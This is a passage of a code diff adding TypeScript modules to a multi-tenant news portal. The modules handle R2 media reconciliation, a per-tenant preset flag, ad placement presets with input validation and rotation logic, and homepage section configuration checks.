+  expiredPendingTotal: number;
+  expiredPendingDeleted: number;
+  expiredPendingRacedSkipped: number;
+  expiredPendingDeferred: number;
+  staleOrphanedTotal: number;
+  staleOrphanedDeleted: number;
+  staleOrphanedDeferred: number;
+  orphanInR2Total: number;
+  orphanInR2Eligible: number;
+  orphanInR2Deleted: number;
+  orphanInR2RaceAverted: number;
+  orphanInR2Deferred: number;
+};
+
+export type NewsMediaReconciliationSummary = {
+  totals: NewsMediaReconciliationTotals;
+  tenantResults: NewsMediaTenantReconciliationResult[];
+  /** `true` if `signal` aborted before every active tenant was processed — the remaining tenants get a fresh attempt on the NEXT scheduled run, same "cooperative, bounded" cancellation model as `iterateTenantsInBatches`. */
+  aborted: boolean;
+};
+
+function emptyTotals(): NewsMediaReconciliationTotals {
+  return {
+    tenantsChecked: 0,
+    tenantsWithR2ListFailure: 0,
+    tenantsWithTruncatedSnapshot: 0,
+    healthy: 0,
+    orphanInDb: 0,
+    expiredPendingTotal: 0,
+    expiredPendingDeleted: 0,
+    expiredPendingRacedSkipped: 0,
+    expiredPendingDeferred: 0,
+    staleOrphanedTotal: 0,
+    staleOrphanedDeleted: 0,
+    staleOrphanedDeferred: 0,
+    orphanInR2Total: 0,
+    orphanInR2Eligible: 0,
+    orphanInR2Deleted: 0,
+    orphanInR2RaceAverted: 0,
+    orphanInR2Deferred: 0
+  };
+}
+
+/**
+ * Reconciles EVERY active tenant, one at a time (never more than one
+ * tenant's worth of R2 listing/cleanup in flight at once — same "bounded,
+ * sequential" shape `iterateTenantsInBatches` uses elsewhere). A single
+ * tenant's R2 outage (`r2ListFailed`) is recorded in that tenant's own
+ * result and in `totals.tenantsWithR2ListFailure`, but never stops the loop
+ * — every other tenant still gets processed this run.
+ */
+export async function reconcileNewsMediaForAllTenants(
+  sql: Bun.SQL,
+  config: NewsMediaR2Config,
+  r2Client: NewsMediaR2Client,
+  options: NewsMediaReconciliationOptions = {}
+): Promise<NewsMediaReconciliationSummary> {
+  const tenants = await fetchActiveTenants(sql);
+  const totals = emptyTotals();
+  const tenantResults: NewsMediaTenantReconciliationResult[] = [];
+  let aborted = false;
+
+  for (const tenant of tenants) {
+    if (options.signal?.aborted) {
+      aborted = true;
+      break;
+    }
+
+    const result = await reconcileNewsMediaForTenant(
+      sql,
+      tenant.id,
+      config,
+      r2Client,
+      options
+    );
+
+    tenantResults.push(result);
+
+    totals.tenantsChecked += 1;
+    if (result.r2ListFailed) totals.tenantsWithR2ListFailure += 1;
+    if (result.dbSnapshotTruncated) totals.tenantsWithTruncatedSnapshot += 1;
+    totals.healthy += result.healthyCount;
+    totals.orphanInDb += result.orphanInDb.length;
+    totals.expiredPendingTotal += result.expiredPending.total;
+    totals.expiredPendingDeleted += result.expiredPending.deleted;
+    totals.expiredPendingRacedSkipped += result.expiredPending.racedSkipped;
+    totals.expiredPendingDeferred += result.expiredPending.deferred;
+    totals.staleOrphanedTotal += result.staleOrphaned.total;
+    totals.staleOrphanedDeleted += result.staleOrphaned.deleted;
+    totals.staleOrphanedDeferred += result.staleOrphaned.deferred;
+    totals.orphanInR2Total += result.orphanInR2.total;
+    totals.orphanInR2Eligible += result.orphanInR2.eligible;
+    totals.orphanInR2Deleted += result.orphanInR2.deleted;
+    totals.orphanInR2RaceAverted += result.orphanInR2.raceAverted;
+    totals.orphanInR2Deferred += result.orphanInR2.deferred;
+  }
+
+  return { totals, tenantResults, aborted };
+}

--- a/src/modules/news-portal/application/news-portal-tenant-state.ts
+++ b/src/modules/news-portal/application/news-portal-tenant-state.ts
@@ -1,0 +1,48 @@
+/**
+ * Tamper-proof per-tenant "has this tenant genuinely applied the
+ * `news_portal_full_online_r2` preset" signal (Issue #636, migration
+ * `043_awcms_news_portal_tenant_state_schema.sql`). See that
+ * migration's header comment for the full story of why this needed to be
+ * a brand-new, dedicated table rather than reusing
+ * `awcms_tenant_modules`/`awcms_module_settings` (both were
+ * tried, both failed — one silently useless, one silently exploitable).
+ *
+ * `markFullOnlineR2ModeApplied` is called ONLY from
+ * `apply-news-portal-preset.ts` (the sanctioned entry point for this
+ * preset) — no route/domain code anywhere else should import it. There is
+ * deliberately no corresponding "unmark"/"clear" function and no HTTP
+ * route exposes a write path to this table at all; the only way this
+ * signal changes is by successfully re-running the preset activation.
+ */
+
+export async function markFullOnlineR2ModeApplied(
+  tx: Bun.SQL,
+  tenantId: string,
+  appliedAt: Date = new Date()
+): Promise<void> {
+  await tx`
+    INSERT INTO awcms_news_portal_tenant_state
+      (tenant_id, full_online_r2_mode_applied_at, updated_at)
+    VALUES (${tenantId}, ${appliedAt}, now())
+    ON CONFLICT (tenant_id) DO UPDATE SET
+      full_online_r2_mode_applied_at = ${appliedAt},
+      updated_at = now()
+  `;
+}
+
+/**
+ * `true` only if this tenant has a row here at all — a tenant that never
+ * had `markFullOnlineR2ModeApplied` called for it (the overwhelming
+ * majority of tenants) has no row, fail-closed by construction.
+ */
+export async function isFullOnlineR2ModeAppliedForTenant(
+  tx: Bun.SQL,
+  tenantId: string
+): Promise<boolean> {
+  const rows = (await tx`
+    SELECT tenant_id FROM awcms_news_portal_tenant_state
+    WHERE tenant_id = ${tenantId}
+  `) as { tenant_id: string }[];
+
+  return rows.length > 0;
+}

--- a/src/modules/news-portal/domain/ad-placement-policy.ts
+++ b/src/modules/news-portal/domain/ad-placement-policy.ts
@@ -1,0 +1,501 @@
+/**
+ * News portal advertisement placement presets (Issue #638, epic
+ * `news_portal`). `blog_content` already ships a generic ads system
+ * (`ad-policy.ts`/`ads-directory.ts`, Issue #542) whose `imageUrl` is a
+ * free-form absolute http(s) URL — this file deliberately does NOT extend
+ * that system. Every ad configured here references a verified R2 media
+ * object (`mediaObjectId`, checked at the application layer against the
+ * registry from Issue #633 — see `../application/ad-placement-reference-
+ * validation.ts`), never a client-supplied image URL, so R2-only-ness holds
+ * by construction rather than by a runtime mode gate (see migration
+ * `049_awcms_news_portal_ad_placements_schema.sql`'s header comment
+ * for the full "why a new table, not a mode-gated extension of
+ * `awcms_blog_ads`" reasoning).
+ *
+ * `placementKey` is NOT immutable after creation (contrast with
+ * `homepage-section-policy.ts`'s `sectionType`) — every placement preset
+ * shares the exact same row shape here (media reference + link + schedule
+ * + rotation knobs), so there is no config-shape hazard in reassigning an
+ * existing row to a different placement via PATCH.
+ */
+export type AdPlacementKey =
+  | "header_banner"
+  | "below_headline"
+  | "homepage_middle"
+  | "homepage_bottom"
+  | "article_top"
+  | "article_middle"
+  | "article_bottom"
+  | "sidebar_top"
+  | "sidebar_middle"
+  | "sidebar_bottom"
+  | "category_archive_top"
+  | "search_result_top";
+
+export const AD_PLACEMENT_KEYS: readonly AdPlacementKey[] = [
+  "header_banner",
+  "below_headline",
+  "homepage_middle",
+  "homepage_bottom",
+  "article_top",
+  "article_middle",
+  "article_bottom",
+  "sidebar_top",
+  "sidebar_middle",
+  "sidebar_bottom",
+  "category_archive_top",
+  "search_result_top"
+];
+
+export function isAdPlacementKey(value: unknown): value is AdPlacementKey {
+  return (
+    typeof value === "string" && (AD_PLACEMENT_KEYS as string[]).includes(value)
+  );
+}
+
+export type AdRotationMode = "latest" | "priority" | "random_safe" | "weighted";
+
+export const AD_ROTATION_MODES: readonly AdRotationMode[] = [
+  "latest",
+  "priority",
+  "random_safe",
+  "weighted"
+];
+
+export function isAdRotationMode(value: unknown): value is AdRotationMode {
+  return (
+    typeof value === "string" && (AD_ROTATION_MODES as string[]).includes(value)
+  );
+}
+
+/**
+ * Same base raster allow-list `NEWS_MEDIA_R2_KNOWN_MIME_TYPES`
+ * (`news-media-r2-config.ts`) sniffs for (`news-media-mime-sniffer.ts`) —
+ * SVG is excluded by design (Keputusan kunci #5). Duplicated here as a
+ * plain literal rather than imported: this file must stay a dependency-free
+ * pure module (no `Bun.SQL`/config plumbing) importable from both the
+ * application layer and tests without pulling in env-var resolution.
+ */
+export const AD_PLACEMENT_DEFAULT_MEDIA_TYPES: readonly string[] = [
+  "image/jpeg",
+  "image/png",
+  "image/webp",
+  "image/gif"
+];
+
+export type AdPlacementPreset = {
+  /** Advisory display metadata only — NOT enforced against the referenced media object's real `width`/`height`. Enforcing an exact/near pixel match risks rejecting legitimately-cropped-but-still-appropriate images and isn't required by the issue's acceptance criteria; this is admin-UI guidance only. */
+  recommendedSize: string;
+  /**
+   * Restricts which of the referenced media object's (already server-side
+   * sniffed, see `news-media-mime-sniffer.ts`) MIME types may be used in
+   * this placement. Every preset below currently shares the same default
+   * set, so this check is currently redundant with what the R2 upload
+   * pipeline already guarantees (a verified media object's `mimeType` is
+   * always one of these four) — it exists as real, tested, defense-in-depth
+   * machinery (`../application/ad-placement-reference-validation.ts`) so a
+   * FUTURE placement can narrow its allow-list (e.g. disallow animated GIF
+   * in a tight banner slot) without a new migration or a new validation
+   * mechanism, not because any placement narrows it today.
+   */
+  allowedMediaTypes: readonly string[];
+  /**
+   * Cap applied at RENDER-selection time only (`ad-placement-rotation.ts`'s
+   * `selectAdsForRotation`) — see migration 049's header comment for why
+   * this is not a write-time limit on configured row count.
+   */
+  maxItems: number;
+};
+
+export const AD_PLACEMENT_PRESETS: Readonly<
+  Record<AdPlacementKey, AdPlacementPreset>
+> = {
+  header_banner: {
+    recommendedSize: "728x90",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  },
+  below_headline: {
+    recommendedSize: "970x250",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  },
+  homepage_middle: {
+    recommendedSize: "300x250",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 3
+  },
+  homepage_bottom: {
+    recommendedSize: "728x90",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  },
+  article_top: {
+    recommendedSize: "728x90",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  },
+  article_middle: {
+    recommendedSize: "300x250",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  },
+  article_bottom: {
+    recommendedSize: "728x90",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  },
+  sidebar_top: {
+    recommendedSize: "300x250",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  },
+  sidebar_middle: {
+    recommendedSize: "300x250",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  },
+  sidebar_bottom: {
+    recommendedSize: "300x250",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  },
+  category_archive_top: {
+    recommendedSize: "728x90",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  },
+  search_result_top: {
+    recommendedSize: "728x90",
+    allowedMediaTypes: AD_PLACEMENT_DEFAULT_MEDIA_TYPES,
+    maxItems: 1
+  }
+};
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+
+/** Same cap as `content-validation.ts`'s `MAX_TITLE_LENGTH`/`blog-settings-policy.ts`'s `MAX_BLOG_TITLE_LENGTH` — security-auditor Low finding on PR #727: `name` previously had no upper bound. */
+const MAX_AD_PLACEMENT_NAME_LENGTH = 200;
+
+function isNonEmptyString(value: unknown): value is string {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+function isUuid(value: unknown): value is string {
+  return typeof value === "string" && UUID_PATTERN.test(value);
+}
+
+/**
+ * Absolute http(s) check for the ad's (optional, possibly external) link
+ * URL — same rule `blog-content/domain/seo-validation.ts`'s
+ * `isAbsoluteHttpUrl`/`blog-content/domain/ad-policy.ts` already apply to
+ * their own URL fields, deliberately DUPLICATED (not imported) here: a
+ * `news_portal` `domain` file may never import `blog_content`'s
+ * `application`/`domain` tree (`tests/unit/module-boundary.test.ts`, Issue
+ * #681) — this two-line pure predicate is cheaper to keep in sync by eye
+ * than to route through a cross-module port for. Rejects `javascript:`/
+ * `data:`/relative paths/anything that isn't a well-formed `http:`/`https:`
+ * URL — this is what keeps the (possibly external) link from ever becoming
+ * an XSS or scheme-confusion channel.
+ */
+export function isSafeAdLinkUrl(value: string): boolean {
+  try {
+    const parsed = new URL(value);
+    return parsed.protocol === "http:" || parsed.protocol === "https:";
+  } catch {
+    return false;
+  }
+}
+
+function parseOptionalDate(
+  value: unknown,
+  field: string,
+  errors: ValidationError[]
+): Date | null {
+  if (value === undefined || value === null) {
+    return null;
+  }
+
+  if (typeof value !== "string") {
+    errors.push({
+      field,
+      message: `${field} must be an ISO 8601 datetime string.`
+    });
+    return null;
+  }
+
+  const parsed = new Date(value);
+
+  if (Number.isNaN(parsed.getTime())) {
+    errors.push({
+      field,
+      message: `${field} must be a valid ISO 8601 datetime.`
+    });
+    return null;
+  }
+
+  return parsed;
+}
+
+export type CreateAdPlacementInput = {
+  placementKey: AdPlacementKey;
+  name: string;
+  mediaObjectId: string;
+  linkUrl: string | null;
+  rotationMode: AdRotationMode;
+  priority: number;
+  isActive: boolean;
+  startsAt: Date | null;
+  endsAt: Date | null;
+};
+
+export type CreateAdPlacementValidationResult =
+  | { valid: true; value: CreateAdPlacementInput }
+  | { valid: false; errors: ValidationError[] };
+
+export function validateCreateAdPlacementInput(
+  body: unknown
+): CreateAdPlacementValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+
+  if (!isAdPlacementKey(record.placementKey)) {
+    errors.push({
+      field: "placementKey",
+      message: `placementKey must be one of ${AD_PLACEMENT_KEYS.join(", ")}.`
+    });
+  }
+
+  if (!isNonEmptyString(record.name)) {
+    errors.push({ field: "name", message: "name is required." });
+  } else if (record.name.length > MAX_AD_PLACEMENT_NAME_LENGTH) {
+    errors.push({
+      field: "name",
+      message: `name must be at most ${MAX_AD_PLACEMENT_NAME_LENGTH} characters.`
+    });
+  }
+
+  if (!isUuid(record.mediaObjectId)) {
+    errors.push({
+      field: "mediaObjectId",
+      message: "mediaObjectId is required and must be a UUID."
+    });
+  }
+
+  let linkUrl: string | null = null;
+
+  if (record.linkUrl !== undefined && record.linkUrl !== null) {
+    if (
+      typeof record.linkUrl !== "string" ||
+      !isSafeAdLinkUrl(record.linkUrl)
+    ) {
+      errors.push({
+        field: "linkUrl",
+        message: "linkUrl must be an absolute http(s) URL when provided."
+      });
+    } else {
+      linkUrl = record.linkUrl;
+    }
+  }
+
+  let rotationMode: AdRotationMode = "latest";
+
+  if (record.rotationMode !== undefined) {
+    if (!isAdRotationMode(record.rotationMode)) {
+      errors.push({
+        field: "rotationMode",
+        message: `rotationMode must be one of ${AD_ROTATION_MODES.join(", ")}.`
+      });
+    } else {
+      rotationMode = record.rotationMode;
+    }
+  }
+
+  let priority = 0;
+
+  if (record.priority !== undefined) {
+    if (
+      typeof record.priority !== "number" ||
+      !Number.isInteger(record.priority) ||
+      record.priority < 0
+    ) {
+      errors.push({
+        field: "priority",
+        message: "priority must be a non-negative integer."
+      });
+    } else {
+      priority = record.priority;
+    }
+  }
+
+  const startsAt = parseOptionalDate(record.startsAt, "startsAt", errors);
+  const endsAt = parseOptionalDate(record.endsAt, "endsAt", errors);
+
+  if (startsAt && endsAt && endsAt <= startsAt) {
+    errors.push({ field: "endsAt", message: "endsAt must be after startsAt." });
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return {
+    valid: true,
+    value: {
+      placementKey: record.placementKey as AdPlacementKey,
+      name: (record.name as string).trim(),
+      mediaObjectId: record.mediaObjectId as string,
+      linkUrl,
+      rotationMode,
+      priority,
+      isActive: record.isActive !== false,
+      startsAt,
+      endsAt
+    }
+  };
+}
+
+export type UpdateAdPlacementInput = {
+  placementKey?: AdPlacementKey;
+  name?: string;
+  mediaObjectId?: string;
+  linkUrl?: string | null;
+  rotationMode?: AdRotationMode;
+  priority?: number;
+  isActive?: boolean;
+  startsAt?: Date | null;
+  endsAt?: Date | null;
+};
+
+export type UpdateAdPlacementValidationResult =
+  | { valid: true; value: UpdateAdPlacementInput }
+  | { valid: false; errors: ValidationError[] };
+
+export function validateUpdateAdPlacementInput(
+  body: unknown
+): UpdateAdPlacementValidationResult {
+  const record = (body ?? {}) as Record<string, unknown>;
+  const errors: ValidationError[] = [];
+  const value: UpdateAdPlacementInput = {};
+
+  if (record.placementKey !== undefined) {
+    if (!isAdPlacementKey(record.placementKey)) {
+      errors.push({
+        field: "placementKey",
+        message: `placementKey must be one of ${AD_PLACEMENT_KEYS.join(", ")}.`
+      });
+    } else {
+      value.placementKey = record.placementKey;
+    }
+  }
+
+  if (record.name !== undefined) {
+    if (!isNonEmptyString(record.name)) {
+      errors.push({
+        field: "name",
+        message: "name must be a non-empty string."
+      });
+    } else if (record.name.length > MAX_AD_PLACEMENT_NAME_LENGTH) {
+      errors.push({
+        field: "name",
+        message: `name must be at most ${MAX_AD_PLACEMENT_NAME_LENGTH} characters.`
+      });
+    } else {
+      value.name = record.name.trim();
+    }
+  }
+
+  if (record.mediaObjectId !== undefined) {
+    if (!isUuid(record.mediaObjectId)) {
+      errors.push({
+        field: "mediaObjectId",
+        message: "mediaObjectId must be a UUID."
+      });
+    } else {
+      value.mediaObjectId = record.mediaObjectId;
+    }
+  }
+
+  if (record.linkUrl !== undefined) {
+    if (record.linkUrl === null) {
+      value.linkUrl = null;
+    } else if (
+      typeof record.linkUrl !== "string" ||
+      !isSafeAdLinkUrl(record.linkUrl)
+    ) {
+      errors.push({
+        field: "linkUrl",
+        message: "linkUrl must be an absolute http(s) URL when provided."
+      });
+    } else {
+      value.linkUrl = record.linkUrl;
+    }
+  }
+
+  if (record.rotationMode !== undefined) {
+    if (!isAdRotationMode(record.rotationMode)) {
+      errors.push({
+        field: "rotationMode",
+        message: `rotationMode must be one of ${AD_ROTATION_MODES.join(", ")}.`
+      });
+    } else {
+      value.rotationMode = record.rotationMode;
+    }
+  }
+
+  if (record.priority !== undefined) {
+    if (
+      typeof record.priority !== "number" ||
+      !Number.isInteger(record.priority) ||
+      record.priority < 0
+    ) {
+      errors.push({
+        field: "priority",
+        message: "priority must be a non-negative integer."
+      });
+    } else {
+      value.priority = record.priority;
+    }
+  }
+
+  if (record.isActive !== undefined) {
+    if (typeof record.isActive !== "boolean") {
+      errors.push({
+        field: "isActive",
+        message: "isActive must be a boolean."
+      });
+    } else {
+      value.isActive = record.isActive;
+    }
+  }
+
+  if (record.startsAt !== undefined) {
+    value.startsAt = parseOptionalDate(record.startsAt, "startsAt", errors);
+  }
+
+  if (record.endsAt !== undefined) {
+    value.endsAt = parseOptionalDate(record.endsAt, "endsAt", errors);
+  }
+
+  if (
+    value.startsAt !== undefined &&
+    value.endsAt !== undefined &&
+    value.startsAt &&
+    value.endsAt &&
+    value.endsAt <= value.startsAt
+  ) {
+    errors.push({ field: "endsAt", message: "endsAt must be after startsAt." });
+  }
+
+  if (errors.length > 0) {
+    return { valid: false, errors };
+  }
+
+  return { valid: true, value };
+}

--- a/src/modules/news-portal/domain/ad-placement-rotation.ts
+++ b/src/modules/news-portal/domain/ad-placement-rotation.ts
@@ -1,0 +1,129 @@
+import type { AdRotationMode } from "./ad-placement-policy";
+
+/**
+ * Pure rotation-selection logic for news portal ad placements (Issue #638).
+ * Given the full set of currently-eligible (active, in-schedule, tenant-
+ * scoped, media-verified — all decided by the caller before this runs) ad
+ * rows for ONE placement, picks at most `maxItems` of them in the order the
+ * given `rotationMode` implies. No I/O, no `Bun.SQL` — same "selection
+ * logic is pure, existence/safety checks happen in the application layer"
+ * split `homepage-section-rendering.ts`/`content-block-rendering.ts` already
+ * use.
+ *
+ * `randomFn` is injectable (defaults to `Math.random`) purely so
+ * `random_safe`/`weighted` are deterministically testable — never used for
+ * anything security-sensitive (this only decides *display order/subset* of
+ * already-authorized-to-render ads, not access control), so `Math.random`
+ * is an appropriate default; there is no need for `crypto.getRandomValues`
+ * here.
+ */
+export type AdRotationCandidate = {
+  id: string;
+  priority: number;
+  createdAt: Date;
+};
+
+function sortByLatest<T extends AdRotationCandidate>(
+  candidates: readonly T[]
+): T[] {
+  return [...candidates].sort(
+    (a, b) => b.createdAt.getTime() - a.createdAt.getTime()
+  );
+}
+
+function sortByPriority<T extends AdRotationCandidate>(
+  candidates: readonly T[]
+): T[] {
+  return [...candidates].sort((a, b) => {
+    if (b.priority !== a.priority) {
+      return b.priority - a.priority;
+    }
+    return b.createdAt.getTime() - a.createdAt.getTime();
+  });
+}
+
+/** Fisher-Yates shuffle — every permutation equally likely given a uniform `randomFn`. */
+function shuffle<T>(items: readonly T[], randomFn: () => number): T[] {
+  const result = [...items];
+
+  for (let i = result.length - 1; i > 0; i--) {
+    const j = Math.floor(randomFn() * (i + 1));
+    [result[i], result[j]] = [result[j]!, result[i]!];
+  }
+
+  return result;
+}
+
+/**
+ * Weighted sampling WITHOUT replacement — weight = `priority + 1` (so a
+ * `priority: 0` row still has a non-zero chance of being picked/ordered
+ * first, rather than being permanently locked out whenever any higher-
+ * priority row exists). Higher `priority` is proportionally more likely to
+ * be selected earlier, but never guaranteed — this is what distinguishes
+ * `weighted` from the deterministic `priority` mode.
+ */
+function weightedSampleWithoutReplacement<T extends AdRotationCandidate>(
+  candidates: readonly T[],
+  count: number,
+  randomFn: () => number
+): T[] {
+  const pool = [...candidates];
+  const result: T[] = [];
+
+  while (result.length < count && pool.length > 0) {
+    const weights = pool.map((candidate) => candidate.priority + 1);
+    const totalWeight = weights.reduce((sum, weight) => sum + weight, 0);
+    let roll = randomFn() * totalWeight;
+    let selectedIndex = pool.length - 1;
+
+    for (let i = 0; i < weights.length; i++) {
+      roll -= weights[i]!;
+      if (roll <= 0) {
+        selectedIndex = i;
+        break;
+      }
+    }
+
+    result.push(pool[selectedIndex]!);
+    pool.splice(selectedIndex, 1);
+  }
+
+  return result;
+}
+
+/**
+ * Selects at most `maxItems` candidates from `candidates` in the order
+ * `rotationMode` implies. `maxItems <= 0` returns an empty array;
+ * `maxItems` is clamped to `candidates.length` (never pads/repeats).
+ */
+export function selectAdsForRotation<T extends AdRotationCandidate>(
+  candidates: readonly T[],
+  rotationMode: AdRotationMode,
+  maxItems: number,
+  randomFn: () => number = Math.random
+): T[] {
+  if (maxItems <= 0 || candidates.length === 0) {
+    return [];
+  }
+
+  const cappedCount = Math.min(maxItems, candidates.length);
+
+  switch (rotationMode) {
+    case "latest":
+      return sortByLatest(candidates).slice(0, cappedCount);
+    case "priority":
+      return sortByPriority(candidates).slice(0, cappedCount);
+    case "random_safe":
+      return shuffle(candidates, randomFn).slice(0, cappedCount);
+    case "weighted":
+      return weightedSampleWithoutReplacement(
+        candidates,
+        cappedCount,
+        randomFn
+      );
+    default: {
+      const exhaustiveCheck: never = rotationMode;
+      throw new Error(`Unknown rotation mode: ${String(exhaustiveCheck)}`);
+    }
+  }
+}

--- a/src/modules/news-portal/domain/homepage-section-policy.ts
+++ b/src/modules/news-portal/domain/homepage-section-policy.ts
@@ -1,0 +1,527 @@
+/**
+ * Editorial homepage section composer (Issue #637, epic `news_portal`).
+ * Six section types, each with its own strictly-whitelisted `config_json`
+ * shape — no field on any type ever accepts raw HTML or an arbitrary image
+ * URL, only UUIDs referencing already-public-safe/already-R2-verified data
+ * (`blog_content` posts via `postId`/`postIds`, the R2 media registry via
+ * `mediaObjectIds`). `sectionType` is immutable after creation (an update
+ * can change `config`/`title`/`sortOrder`/`isEnabled`/`startsAt`/`endsAt`,
+ * never `sectionType` itself) — the caller (`homepage-section-directory.ts`)
+ * passes the existing row's `sectionType` back into
+ * `validateUpdateHomepageSectionInput` so `config` is always validated
+ * against the one shape it must match, same "type gates which fields are
+ * meaningful" convention `ad-policy.ts`/`menu-policy.ts` already use.
+ *
+ * `video_block`/`ad_slot`/`custom_widget_block` deliberately NOT included —
+ * see migration `044_awcms_news_portal_homepage_sections_schema.sql`'s
+ * header comment for why (blocked on #639/#638, and explicitly out of scope
+ * per the issue body, respectively). A `static_page_block` was considered
+ * and dropped for the same reason — no existing public page-detail
+ * visibility-tested query exists yet to reuse.
+ */
+export type HomepageSectionType =
+  | "headline"
+  | "latest_posts"
+  | "featured_posts"
+  | "editor_picks"
+  | "category_grid"
+  | "gallery_block";
+
+export const HOMEPAGE_SECTION_TYPES: readonly HomepageSectionType[] = [
+  "headline",
+  "latest_posts",
+  "featured_posts",
+  "editor_picks",
+  "category_grid",
+  "gallery_block"
+];
+
+export function isHomepageSectionType(
+  value: unknown
+): value is HomepageSectionType {
+  return (
+    typeof value === "string" &&
+    (HOMEPAGE_SECTION_TYPES as string[]).includes(value)
+  );
+}
+
+export type ValidationError = {
+  field: string;
+  message: string;
+};
+
+const UUID_PATTERN =
+  /^[0-9a-f]{8}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{4}-[0-9a-f]{12}$/i;
+const SECTION_KEY_PATTERN = /^[a-z0-9][a-z0-9_-]{0,63}$/;
+
+const LATEST_POSTS_DEFAULT_LIMIT = 5;
+const LATEST_POSTS_MAX_LIMIT = 20;
+const CURATED_POSTS_MIN = 1;
+const CURATED_POSTS_MAX = 20;
+const CATEGORY_GRID_MIN_CATEGORIES = 1;
+const CATEGORY_GRID_MAX_CATEGORIES = 8;
+const CATEGORY_GRID_DEFAULT_POSTS_PER_CATEGORY = 3;
+const CATEGORY_GRID_MAX_POSTS_PER_CATEGORY = 6;
+const GALLERY_MIN_ITEMS = 1;
+const GALLERY_MAX_ITEMS = 20;
+
+function isNonEmptyString(value: unknown): value is string {
+  return typeof value === "string" && value.trim().length > 0;
+}
+
+function isUuid(value: unknown): value is string {
+  return typeof value === "string" && UUID_PATTERN.test(value);
+}
+
+function isUuidArray(value: unknown): value is string[] {
+  return Array.isArray(value) && value.every((item) => isUuid(item));
+}
+
+export type HeadlineSectionConfig = { postId: string };
+export type LatestPostsSectionConfig = {
+  limit: number;
+  categorySlug: string | null;
+};
+export type CuratedPostsSectionConfig = { postIds: string[] };
+export type CategoryGridSectionConfig = {
+  categorySlugs: string[];
+  postsPerCategory: number;
+};
+export type GalleryBlockSectionConfig = {
+  mediaObjectIds: string[];
+  caption: string | null;
+};
+
+export type HomepageSectionConfigOf<T extends HomepageSectionType> =
+  T extends "headline"
+    ? HeadlineSectionConfig
+    : T extends "latest_posts"
+      ? LatestPostsSectionConfig
+      : T extends "featured_posts" | "editor_picks"
+        ? CuratedPostsSectionConfig
+        : T extends "category_grid"
+          ? CategoryGridSectionConfig
+          : T extends "gallery_block"
+            ? GalleryBlockSectionConfig
+            : never;
+
+function validateHeadlineConfig(
+  record: Record<string, unknown>,
+  errors: ValidationError[]
+): HeadlineSectionConfig | null {
+  if (!isUuid(record.postId)) {
+    errors.push({
+      field: "config.postId",
+      message: "config.postId is required and must be a UUID."
+    });
+    return null;
+  }
+
+  return { postId: record.postId };
+}
+
+function validateLatestPostsConfig(
+  record: Record<string, unknown>,
+  errors: ValidationError[]
+): LatestPostsSectionConfig | null {
+  let limit = LATEST_POSTS_DEFAULT_LIMIT;
+
+  if (record.limit !== undefined) {
+    if (
+      typeof record.limit !== "number" ||
+      !Number.isInteger(record.limit) ||
+      record.limit < 1 ||
+      record.limit > LATEST_POSTS_MAX_LIMIT
+    ) {
+      errors.push({
+        field: "config.limit",
+        message: `config.limit must be an integer between 1 and ${LATEST_POSTS_MAX_LIMIT}.`
+      });
+      return null;
+    }
+
+    limit = record.limit;
+  }
+
+  let categorySlug: string | null = null;
+
+  if (record.categorySlug !== undefined && record.categorySlug !== null) {
+    if (!isNonEmptyString(record.categorySlug)) {
+      errors.push({
+        field: "config.categorySlug",
+        message: "config.categorySlug must be a non-empty string when provided."
+      });
+      return null;
+    }
+
+    categorySlug = record.categorySlug.trim();
+  }
+
+  return { limit, categorySlug };
+}
+
+function validateCuratedPostsConfig(
+  record: Record<string, unknown>,
+  errors: ValidationError[]
+): CuratedPostsSectionConfig | null {
+  if (
+    !isUuidArray(record.postIds) ||
+    record.postIds.length < CURATED_POSTS_MIN ||
+    record.postIds.length > CURATED_POSTS_MAX
+  ) {
+    errors.push({
+      field: "config.postIds",
+      message: `config.postIds is required and must be an array of ${CURATED_POSTS_MIN}-${CURATED_POSTS_MAX} UUIDs.`
+    });
+    return null;
+  }
+
+  return { postIds: record.postIds };
+}
+
+function validateCategoryGridConfig(
+  record: Record<string, unknown>,
+  errors: ValidationError[]
+): CategoryGridSectionConfig | null {
+  if (
+    !Array.isArray(record.categorySlugs) ||
+    record.categorySlugs.length < CATEGORY_GRID_MIN_CATEGORIES ||
+    record.categorySlugs.length > CATEGORY_GRID_MAX_CATEGORIES ||
+    !record.categorySlugs.every((item) => isNonEmptyString(item))
+  ) {
+    errors.push({
+      field: "config.categorySlugs",
+      message: `config.categorySlugs is required and must be an array of ${CATEGORY_GRID_MIN_CATEGORIES}-${CATEGORY_GRID_MAX_CATEGORIES} non-empty strings.`
+    });
+    return null;
+  }
+
+  let postsPerCategory = CATEGORY_GRID_DEFAULT_POSTS_PER_CATEGORY;
+
+  if (record.postsPerCategory !== undefined) {
+    if (
+      typeof record.postsPerCategory !== "number" ||
+      !Number.isInteger(record.postsPerCategory) ||
+      record.postsPerCategory < 1 ||
+      record.postsPerCategory > CATEGORY_GRID_MAX_POSTS_PER_CATEGORY
+    ) {
+      errors.push({
+        field: "config.postsPerCategory",
